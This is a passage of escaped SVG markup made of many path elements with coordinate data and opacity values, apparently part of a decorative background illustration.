d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n          opacity=\"0.1\"></path>\n        <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path 